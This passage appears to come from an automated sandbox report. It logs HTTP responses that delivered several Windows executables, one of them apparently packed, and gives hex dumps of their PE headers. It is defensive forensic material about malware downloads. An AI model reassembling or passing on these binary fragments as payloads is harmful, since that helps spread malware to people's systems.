00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Nov 2024 19:39:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Nov 2024 19:39:48 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Nov 2024 19:39:50 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Nov 2024 19:39:51 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Nov 2024 19:39:54 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Nov 2024 19:39:54 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 13 Nov 2024 19:39:58 GMTContent-Type: application/octet-streamContent-Length: 3278336Last-Modified: Wed, 13 Nov 2024 19:21:38 GMTConnection: keep-aliveETag: "6734fc42-320600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 10 32 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 32 00 00 04 00 00 38 85 32 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 fa 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 fa 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 92 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 73 75 7a 64 69 77 64 79 00 50 2b 00 00 b0 06 00 00 4c 2b 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 74 6c 6e 69 6c 71 62 00 10 00 00 00 00 32 00 00 04 00 00 00 e0 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 32 00 00 22 00 00 00 e4 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 